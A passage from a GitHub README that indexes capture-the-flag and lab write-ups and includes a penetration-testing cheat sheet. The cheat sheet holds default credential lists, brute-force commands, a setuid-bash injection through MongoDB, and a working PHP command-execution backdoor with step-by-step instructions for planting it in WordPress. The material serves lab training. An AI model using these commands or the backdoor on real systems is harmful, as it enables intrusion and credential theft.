[`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 10. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 11. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png" width="59" height="20"/> | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100"/> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | | 12. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100"/> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 13. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 14. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png" width="59" height="20"/> | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 15. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png" width="59" height="20"/> | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | | 16. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 17. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 18. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | | 19. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 20. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 21. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 22. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100"/> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | | 23. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100"/> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 24. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | | 25. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100"/> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 26. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 27. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png" width="59" height="20"/> | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100"/> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | | 28. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 29. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png" width="59" height="20"/> | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100"/> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | | 30. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 31. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 32. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png" width="59" height="20"/> | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100"/> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 33. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100"/> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 34. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100"/> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | | 35. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100"/> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 36. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100"/> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 37. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png" width="59" height="20"/> | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100"/> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 38. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png" width="59" height="20"/> | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100"/> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 39. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | <a name="ttps"></a> ## ☢️ TTPs [↟](#contents) <a name="enumerate"></a> ### ⚙️ Enumerate [🡑](#ttps) <a name="enumerate_app_apache"></a> #### enumerate_app_apache [⇡](#enumerate) ```shell use directory traversal to checkout the config file: /usr/local/etc/apache22/httpd.conf /etc/apache2/sites-enabled/000-default.conf useful when certain config changes block enumeration ``` --- <a name="enumerate_app_apache_tomcat"></a> #### enumerate_app_apache_tomcat [⇡](#enumerate) ```shell tomcat manager default creds: tomcat:tomcat admin:admin admin:password user:password tomcat:s3cret ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="enumerate_app_coldfusion_files"></a> #### enumerate_app_coldfusion_files [⇡](#enumerate) look for available sub directories and files on a coldfusion install ```shell dirb http://<targetip>:<targetport> /usr/share/dirb/wordlists/vulns/coldfusion.txt ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="enumerate_app_coldfusion_version"></a> #### enumerate_app_coldfusion_version [⇡](#enumerate) find out the coldfusion install version ```shell http://<targetip>:<targetport>/CFIDE/adminapi/base.cfc?wsdl ``` [+] http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf (pg42) --- <a name="enumerate_app_drupal"></a> #### enumerate_app_drupal [⇡](#enumerate) ```shell version: http://<targetip>:<targetport>/CHANGELOG.txt bruteforce: ipaddr="<targetip>"; id=$(curl -s http://$ipaddr/user/ | grep "form_build_id" | cut -d"\"" -f6); hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V scan: /opt/droopescan/droopescan scan drupal -u http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_joomla"></a> #### enumerate_app_joomla [⇡](#enumerate) ```shell joomscan --url http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_mongo"></a> #### enumerate_app_mongo [⇡](#enumerate) ```shell mongo -p -u mark scheduler => connects to mongodb as user mark and allows interaction with db scheduler use scheduler => switch db db.getCollectionNames() => list all collections/tables db.tasks.find({}) => show all entries from collection/table db.tasks.insert({"cmd": "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;"}) => insert a new entry within table tasks ``` --- <a name="enumerate_app_nodejs"></a> #### enumerate_app_nodejs [⇡](#enumerate) ```shell check source and look at the js files to find interesting links/apis use burp to spider and create a sitemap of the website find app.js and look for db credentials (sql/mongo) try ssh using db credentials ``` --- <a name="enumerate_app_pfsense"></a> #### enumerate_app_pfsense [⇡](#enumerate) ```shell default credentials: admin/pfsense ``` --- <a name="enumerate_app_phpmyadmin"></a> #### enumerate_app_phpmyadmin [⇡](#enumerate) ```shell default credentials: admin/ admin/admin root/root root/password root/mysql ``` --- <a name="enumerate_app_powershell_history"></a> #### enumerate_app_powershell_history [⇡](#enumerate) For certain accounts (like `sql_svc`) that are both user and service accounts, we can look at the user's PowerShell history and find interesting information. ```shell type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_app_prtg"></a> #### enumerate_app_prtg [⇡](#enumerate) ```shell default credentials: prtgadmin/prtgadmin configuration and backup files (accessed via an open ftp/smb): c:\programdata\paessler\Configuration.dat c:\programdata\paessler\Configuration.old ``` --- <a name="enumerate_app_unrealirc"></a> #### enumerate_app_unrealirc [⇡](#enumerate) ```shell msfconsole use exploit/unix/irc/unreal_ircd_3281_backdoor set rhost <targetip> set rport <targetport> exploit ``` [+] https://snowscan.io/htb-writeup-irked/ --- <a name="enumerate_app_webmin"></a> #### enumerate_app_webmin [⇡](#enumerate) ```shell view any file - even root owned, run perl cgi scripts msf: auxiliary/admin/webmin/file_disclosure can view /etc/ldap.secret file that might give credentials can be used to run a perl cgi script (uploaded via some other means) to gain root reverse shell download shadow file and try cracking hashes download ssh authorized_keys for users (names obtained from shadow file), use edb:5720 and "ssh -i" ``` --- <a name="enumerate_app_wordpress"></a> #### enumerate_app_wordpress [⇡](#enumerate) ```shell default creds: admin/password look for phpmyadmin, plugins directories look for wp-config.php file (via an open smb/ftp share) => contains db creds, useful for phpmyadmin and ssh enumerate authors: http://192.168.92.167:<targetport>/?author=1 => will show username as "AUTHOR ARCHIVES: <username>" http://192.168.92.167:<targetport>/?author=2 => will not show username if author id is invalid wpuser http://192.168.92.134/ usernames wpscan --url http://192.168.92.134:80/ -e vp,vt,tt,cb,dbe,u,m bruteforce wordpress login: wpscan --url http://192.168.92.134 -P fsocity.dic.trimmed -U elliot wpscan --url http://192.168.92.169/backup_wordpress/ -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -U admin,john wpscan --disable-tls-checks --url https://192.168.92.165:12380/blogblog/ -P $HOME/toolbox/vulnhub/mrrobot1/pass.list -U elliot hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.92.169 http-post-form "/backup_wordpress/wp-login.php:log=admin&pwd=^PASS^:ERROR" wordpress to shell: #1 add webshell via /wp-admin/theme-editor.php?file=404.php a. "Appearance" -> "Editor" b. select "404 Template" (404.php) c. add php backdoor before the `<?php get_footer(); ?>` line and click "Update File" d. example php backdoor: /usr/share/webshells/php/php-reverse-shell.php e. run local netcat listener f. visit a non-existing page: http://192.168.92.191/wordpress/?p=<attackerport>99 #2 add webshell @ /wp-admin/ a. "Appearance" -> "Editor" b. select "Theme Footer" (footer.php) c. add php backdoor at the end of file and click "Update File" d. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ e. visit http://192.168.92.169/backup_wordpress/?cmd=cat%20/etc/passwd to run commands f. result will be concatenated to the end of the page #3 add webshell via media file @ /wp-admin/plugin-install.php a. "Upload plugin" -> "Browse" b. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ c. plugin install might fail, but php file will be uploaded as a media file d. visit http://192.168.92.169/backup_wordpress/wp-admin/upload.php to confirm file upload e. use http://192.168.92.169/backup_wordpress/wp-content/uploads/<year>/<monthid>/<filename>.php?cmd=cat%20/etc/passwd to run commands #4 metasploit: msf> use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.92.169 msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup-wordpress msf exploit(unix/webapp/wp_admin_shell_upload) > set username john msf exploit(unix/webapp/wp_admin_shell_upload) > set password enigma msf exploit(unix/webapp/wp_admin_shell_upload) > exploit extract hashes from wp mysql db and crack via john: select concat_ws(':', user_login, user_pass) from wp_users; john --wordlist=/usr/share/wordlists/rockyou.txt hashes.wp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 4. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), 